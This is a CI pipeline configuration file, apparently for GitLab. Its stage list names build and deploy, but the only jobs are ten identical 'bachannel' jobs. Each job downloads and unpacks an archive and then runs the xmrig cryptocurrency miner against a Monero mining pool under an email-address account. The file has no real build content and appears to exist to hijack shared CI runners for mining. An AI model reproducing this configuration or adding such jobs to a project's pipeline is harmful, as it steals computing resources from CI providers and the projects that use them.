stages:
  - bachannel
  - build
  - deploy
 
bachannel_1:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
bachannel_2:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x 
 
bachannel_3:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
 
bachannel_4:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
 
bachannel_5:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
 
bachannel_6:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
bachannel_7:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
 
bachannel_8:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
 
bachannel_9:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x
 
bachannel_10:
  stage: bachannel
  script:
    - wget https://github.com/revoxhere/duino-coin/releases/download/2.5.2/Duino-Coin_2.5.2_linux.zip && tar -zxf Duino-Coin_2.5.2_linux.zip && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u maulanaalamsyah0000@gmail.com -p x